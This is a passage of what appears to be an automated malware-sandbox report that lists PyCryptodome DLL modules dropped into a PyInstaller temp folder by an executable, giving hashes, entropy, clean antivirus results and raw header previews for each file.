                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." .....*..........P.....................................................`..........................................H......hI..d....p.......`..X...............(....A...............................A..8............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data........P.......<..............@....pdata..X....`.......>..............@..@.rsrc........p.......B..............@..@.reloc..(............D..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA224.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):21504
                                                                                                                                                                                                                          Entropy (8bit):5.878701941774916
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:EJWo4IRCGHX1KXqHGcvYHp5RYcARQOj4MSTjqgPmJD1OhgkxEv:EcIRnHX1P/YtswvaD1Rk
                                                                                                                                                                                                                          MD5:2F2655A7BBFE08D43013EDDA27E77904
                                                                                                                                                                                                                          SHA1:33D51B6C423E094BE3E34E5621E175329A0C0914
                                                                                                                                                                                                                          SHA-256:C734ABBD95EC120CB315C43021C0E1EB1BF2295AF9F1C24587334C3FCE4A5BE1
                                                                                                                                                                                                                          SHA-512:8AF99ACC969B0E560022F75A0CDCAA85D0BDEADADEACD59DD0C4500F94A5843EA0D4107789C1A613181B1F4E5252134A485EF6B1D9D83CDB5676C5FEE4D49B90
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...S..f.........." .....6... ......P.....................................................`.........................................@Z......([..d............p..................(....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..x....P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..(............R..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA256.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):21504
                                                                                                                                                                                                                          Entropy (8bit):5.881781476285865
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:EJWo4IRCGHXfKXqHGcvYHp5RYcARQOj4MSTjqgPmJD12gkxEv:EcIRnHXfP/YtswvaD1zk
                                                                                                                                                                                                                          MD5:CDE035B8AB3D046B1CE37EEE7EE91FA0
                                                                                                                                                                                                                          SHA1:4298B62ED67C8D4F731D1B33E68D7DC9A58487FF
                                                                                                                                                                                                                          SHA-256:16BEA322D994A553B293A724B57293D57DA62BC7EAF41F287956B306C13FD972
                                                                                                                                                                                                                          SHA-512:C44FDEE5A210459CE4557351E56B2D357FD4937F8EC8EACEAB842FEE29761F66C2262FCBAAC837F39C859C67FA0E23D13E0F60B3AE59BE29EB9D8ABAB0A572BB
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...S..f.........." .....6... ......P.....................................................`.........................................@Z......([..d............p..................(....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..x....P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..(............R..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA384.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):26624
                                                                                                                                                                                                                          Entropy (8bit):5.837887867708438
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:e839Cc4itui0gel9soFdkO66MlPGXmXcyYDTzks:Ns4u/FZ6nPxMLDvk
                                                                                                                                                                                                                          MD5:999D431197D7E06A30E0810F1F910B9A
                                                                                                                                                                                                                          SHA1:9BFF781221BCFFD8E55485A08627EC2A37363C96
                                                                                                                                                                                                                          SHA-256:AB242B9C9FB662C6F7CB57F7648F33983D6FA3BB0683C5D4329EC2CC51E8C875
                                                                                                                                                                                                                          SHA-512:A5DD92DD471ADB44EEFE5919EF9CA3978724E21174DF5B3A9C1F0AB462F928E5A46A460D02417DB7522F5DE3BFEED5EEE6B1EAFAF3E621722E85E72675F7096F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...T..f.........." .....H..."......P.....................................................`..........................................k.......l..d...............................(...pd...............................d..8............`...............................text....F.......H.................. ..`.rdata.......`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_SHA512.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):26624
                                                                                                                                                                                                                          Entropy (8bit):5.895310340516013
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:lcX9Nf4ttui0gel9soFdkO66MlPGXmXc/vDTOvk:a38u/FZ6nPxM3DAk
                                                                                                                                                                                                                          MD5:0931ABBF3AED459B1A2138B551B1D3BB
                                                                                                                                                                                                                          SHA1:9EC0296DDAF574A89766A2EC035FC30073863AB0
                                                                                                                                                                                                                          SHA-256:1729A0DC6B80CB7A3C07372B98B10D3C6C613EA645240878E1FDE6A992FA06F1
                                                                                                                                                                                                                          SHA-512:9F970BB4D10B94F525DDDDE307C7DA5E672BBFB3A3866A34B89B56ADA99476724FD690A4396857182749294F67F36DB471A048789FB715D2A7DAF46917FC1947
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...T..f.........." .....H..."......P.....................................................`.........................................@l......(m..d...............................(....d...............................e..8............`...............................text...hG.......H.................. ..`.rdata..x....`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_ghash_clmul.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):12800
                                                                                                                                                                                                                          Entropy (8bit):4.967737129255606
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:dMpWt/1nCuqaL0kt7TsEx2fiTgDZqGF0T7cqgkLgJ:k/k1Ts64DDJyBgkLg
                                                                                                                                                                                                                          MD5:5F057A380BACBA4EF59C0611549C0E02
                                                                                                                                                                                                                          SHA1:4B758D18372D71F0AA38075F073722A55B897F71
                                                                                                                                                                                                                          SHA-256:BCB14DAC6C87C24269D3E60C46B49EFFB1360F714C353318F5BBAA48C79EC290
                                                                                                                                                                                                                          SHA-512:E1C99E224745B86EE55822C1DBCB4555A11EC31B72D87B46514917EB61E0258A1C6D38C4F592969C17EB4F0F74DA04BCECA31CF1622720E95F0F20E9631792E8
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...V..f.........." ................P.....................................................`.........................................P8.......8..d....`.......P...............p..(....1...............................1..8............0...............................text............................... ..`.rdata..2....0......................@..@.data...H....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..(....p.......0..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_ghash_portable.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):13312
                                                                                                                                                                                                                          Entropy (8bit):5.007867576025166
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:bMt/1nCuqaL0ktPH0T7fwtF4zDn2rGacqgRGd:1/kpU3Yv4zDXqgRGd
                                                                                                                                                                                                                          MD5:49BCA1B7DF076D1A550EE1B7ED3BD997
                                                                                                                                                                                                                          SHA1:47609C7102F5B1BCA16C6BAD4AE22CE0B8AEE9E9
                                                                                                                                                                                                                          SHA-256:49E15461DCB76690139E71E9359F7FCF92269DCCA78E3BFE9ACB90C6271080B2
                                                                                                                                                                                                                          SHA-512:8574D7FA133B72A4A8D1D7D9FDB61053BC88C2D238B7AC7D519BE19972B658C44EA1DE433885E3206927C75DD5D1028F74999E048AB73189585B87630F865466
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...V..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..(....p.......2..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_keccak.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):15872
                                                                                                                                                                                                                          Entropy (8bit):5.226023387740053
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:rfRKTN+HLjRskTdf4WazSTkwjEvuY2bylHDiYIgovg:mcHfRl5pauoSjy5DiE
                                                                                                                                                                                                                          MD5:CB5CFDD4241060E99118DEEC6C931CCC
                                                                                                                                                                                                                          SHA1:1E7FED96CF26C9F4730A4621CA9D18CECE3E0BCE
                                                                                                                                                                                                                          SHA-256:A8F809B6A417AF99B75EEEEA3ECD16BDA153CBDA4FFAB6E35CE1E8C884D899C4
                                                                                                                                                                                                                          SHA-512:8A89E3563C14B81353D251F9F019D8CBF07CB98F78452B8522413C7478A0D77B9ABF2134E4438145D6363CDA39721D2BAE8AD13D1CDACCBB5026619D95F931CF
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...U..f.........." ..... ... ......P.....................................................`..........................................9.......9..d....`.......P..X............p..(...p2...............................2..8............0...............................text............ .................. ..`.rdata..@....0.......$..............@..@.data........@.......4..............@....pdata..X....P.......6..............@..@.rsrc........`.......:..............@..@.reloc..(....p.......<..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Hash\_poly1305.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):14848
                                                                                                                                                                                                                          Entropy (8bit):5.262055670423592
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:C/ZN2eq/b04PAHH41F6fnVS0sVn+5CA5Z1cD66WGcqgFjLg:vI4IHHaQfSVnCZyDImgFjLg
                                                                                                                                                                                                                          MD5:18D2D96980802189B23893820714DA90
                                                                                                                                                                                                                          SHA1:5DEE494D25EB79038CBC2803163E2EF69E68274C
                                                                                                                                                                                                                          SHA-256:C2FD98C677436260ACB9147766258CB99780A007114AED37C87893DF1CF1A717
                                                                                                                                                                                                                          SHA-512:0317B65D8F292332C5457A6B15A77548BE5B2705F34BB8F4415046E3E778580ABD17B233E6CC2755C991247E0E65B27B5634465646715657B246483817CACEB7
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...V..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..|............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......."..............@..@.data........@.......0..............@....pdata..|....P.......2..............@..@.rsrc........`.......6..............@..@.reloc..(....p.......8..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Math\_modexp.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):36352
                                                                                                                                                                                                                          Entropy (8bit):5.913843738203007
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:dspbXtHQY4ubrttQza9CHnZXQsnecAlOF0qZLAXxQI3Sya6XPpMg3Yx8MnDcCPSq:7Y44UagH6cAFCLUSYpMg3YDzPo5kG9G
                                                                                                                                                                                                                          MD5:EF472BA63FD22922CA704B1E7B95A29E
                                                                                                                                                                                                                          SHA1:700B68E7EF95514D5E94D3C6B10884E1E187ACD8
                                                                                                                                                                                                                          SHA-256:66EEF4E6E0CEEEF2C23A758BFBEDAE7C16282FC93D0A56ACAFC40E871AC3F01C
                                                                                                                                                                                                                          SHA-512:DC2060531C4153C43ABF30843BCB5F8FA082345CA1BB57F9AC8695EDDB28FF9FDA8132B6B6C67260F779D95FCADCAE2811091BCA300AB1E041FAE6CC7B50ABD8
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d...^..f.........." .....`...0......`.....................................................`..........................................~..|...L...d...............<...............(....q...............................q..8............p..(............................text...X^.......`.................. ..`.rdata.......p.......d..............@..@.data................x..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc..(...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Protocol\_scrypt.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):12288
                                                                                                                                                                                                                          Entropy (8bit):4.735350805948923
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:rhsC3eqv6b0q3OQ3rHu5bc64OhD2I/p3cqgONLg:r/Hq3jHuY64OhDJJgONLg
                                                                                                                                                                                                                          MD5:3B1CE70B0193B02C437678F13A335932
                                                                                                                                                                                                                          SHA1:063BFD5A32441ED883409AAD17285CE405977D1F
                                                                                                                                                                                                                          SHA-256:EB2950B6A2185E87C5318B55132DFE5774A5A579259AB50A7935A7FB143EA7B1
                                                                                                                                                                                                                          SHA-512:0E02187F17DFCFD323F2F0E62FBFE35F326DCF9F119FC8B15066AFAEEE4EB7078184BC85D571B555E9E67A2DD909EC12D8A67E3D075E9B1283813EF274E05C0D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^:.6?T.6?T.6?T.?G..2?T.dJU.4?T.}GU.5?T.6?U..?T.dJQ.<?T.dJP.>?T.dJW.5?T..J\.7?T..JT.7?T..J..7?T..JV.7?T.Rich6?T.........................PE..d...Z..f.........." ................P.....................................................`..........................................8..d....8..d....`.......P..4............p..(....1...............................1..8............0...............................text...H........................... ..`.rdata..0....0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..(....p......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_curve25519.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):22528
                                                                                                                                                                                                                          Entropy (8bit):5.705606408072877
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:19BcRxBmau38CYIl9bhgIW0mvufueNr359/tjGGDEFSegqrA:NcRy38J+9dmvufFtaGDV
                                                                                                                                                                                                                          MD5:FF33C306434DEC51D39C7BF1663E25DA
                                                                                                                                                                                                                          SHA1:665FCF47501F1481534597C1EAC2A52886EF0526
                                                                                                                                                                                                                          SHA-256:D0E3B6A2D0E073B2D9F0FCDB051727007943A17A4CA966D75EBA37BECDBA6152
                                                                                                                                                                                                                          SHA-512:66A909DC9C3B7BD4050AA507CD89B0B3A661C85D33C881522EC9568744953B698722C1CBFF093F9CBCD6119BD527FECAB05A67F2E32EC479BE47AFFA4377362C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...\..f.........." .....6...$......P.....................................................`.........................................`Y......`Z..d............p..................(....R..............................0R..8............P...............................text...(5.......6.................. ..`.rdata.......P.......:..............@..@.data........`.......J..............@....pdata.......p.......P..............@..@.rsrc................T..............@..@.reloc..(............V..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_curve448.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):70656
                                                                                                                                                                                                                          Entropy (8bit):6.0189903352673655
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:Jfju4GgRMgWWnEDZiECgd/iwOXUQdbhov0Clb8Cx4hpK8ithLFIDullRPwDHxXOa:pXRMgWiEDZiECgd/iwOXUQdbhov0ClbU
                                                                                                                                                                                                                          MD5:F267BF4256F4105DAD0D3E59023011ED
                                                                                                                                                                                                                          SHA1:9BC6CA0F375CE49D5787C909D290C07302F58DA6
                                                                                                                                                                                                                          SHA-256:1DDE8BE64164FF96B2BAB88291042EB39197D118422BEE56EB2846E7A2D2F010
                                                                                                                                                                                                                          SHA-512:A335AF4DBF1658556ED5DC13EE741419446F7DAEC6BD2688B626A803FA5DD76463D6367C224E0B79B17193735E2C74BA417C26822DAEEF05AC3BAB1588E2DE83
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d...\..f.........." .........8......`........................................P............`.............................................0.......d....0....... ..$............@..(.......................................8............................................text...8........................... ..`.rdata..............................@..@.data...............................@....pdata..$.... ......................@..@.rsrc........0......................@..@.reloc..(....@......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_ec_ws.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):770560
                                                                                                                                                                                                                          Entropy (8bit):7.613224993327352
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:XtIrHoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h:XtIrHoxJFf1p34hcrn5Go9yQO6
                                                                                                                                                                                                                          MD5:1EFD7F7CB1C277416011DE6F09C355AF
                                                                                                                                                                                                                          SHA1:C0F97652AC2703C325AB9F20826A6F84C63532F2
                                                                                                                                                                                                                          SHA-256:AB45FA80A68DB1635D41DC1A4AAD980E6716DAC8C1778CB5F30CDB013B7DF6E6
                                                                                                                                                                                                                          SHA-512:2EC4B88A1957733043BBD63CEAA6F5643D446DB607B3267FAD1EC611E6B0AF697056598AAC2AE5D44AB2B9396811D183C32BCE5A0FF34E583193A417D1C5226B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........s.. .. .. ... .. ..!.. ..!.. .. .. ..!.. ..!.. ..!.. \..!.. \..!.. \.r .. \..!.. Rich.. ................PE..d...[..f.........." ................`.....................................................`.............................................h.......d...............................0......................................8...............(............................text............................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_ed25519.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):26112
                                                                                                                                                                                                                          Entropy (8bit):5.8551858881598795
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:BczadRwoF2MZ81n0XTyMCYIl9bhgIW0mv8aeadRcwRwftjGLD2pRQNgQQ77k:2udRf2MuMJ+9dmv8aea34taLDcfQ
                                                                                                                                                                                                                          MD5:C5FB377F736ED731B5578F57BB765F7A
                                                                                                                                                                                                                          SHA1:5BA51E11F4DE1CAEDEBA0F7D4D10EC62EC109E01
                                                                                                                                                                                                                          SHA-256:32073DF3D5C85ABCE7D370D6E341EF163A8350F6A9EDC775C39A23856CCFDD53
                                                                                                                                                                                                                          SHA-512:D361BCDAF2C700D5A4AC956D96E00961432C05A1B692FC870DB53A90F233A6D24AA0C3BE99E40BD8E5B7C6C1B2BCDCDCFC545292EF321486FFC71C5EA7203E6A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...]..f.........." .....B...&......P.....................................................`..........................................i..0....k..d...............................(... b..............................@b..8............`...............................text....A.......B.................. ..`.rdata..P....`.......F..............@..@.data........p.......V..............@....pdata...............^..............@..@.rsrc................b..............@..@.reloc..(............d..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\PublicKey\_ed448.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):84992
                                                                                                                                                                                                                          Entropy (8bit):6.064677498000638
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:BrYNvxcZeLrIeNs2qkTwe57DsuP45PqAqVDK9agdUiwOXyQdDrov0slb8gx4TBKW:Br4vxcZeLrIeN1TvHsuP45yAqVDK9ag3
                                                                                                                                                                                                                          MD5:8A0C0AA820E98E83AC9B665A9FD19EAF
                                                                                                                                                                                                                          SHA1:6BF5A14E94D81A55A164339F60927D5BF1BAD5C4
                                                                                                                                                                                                                          SHA-256:4EE3D122DCFFE78E6E7E76EE04C38D3DC6A066E522EE9F7AF34A09649A3628B1
                                                                                                                                                                                                                          SHA-512:52496AE7439458DEDB58A65DF9FFDCC3A7F31FC36FE7202FB43570F9BB03ABC0565F5EF32E5E6C048ED3EBC33018C19712E58FF43806119B2FB5918612299E7E
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d...^..f.........." .........8......`.....................................................`..........................................C..h...HE..d....p.......`..l...............(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata..l....`.......>..............@..@.rsrc........p.......H..............@..@.reloc..(............J..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI56402\Crypto\Util\_cpuid_c.pyd

                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\DChOtFdp9T.exe
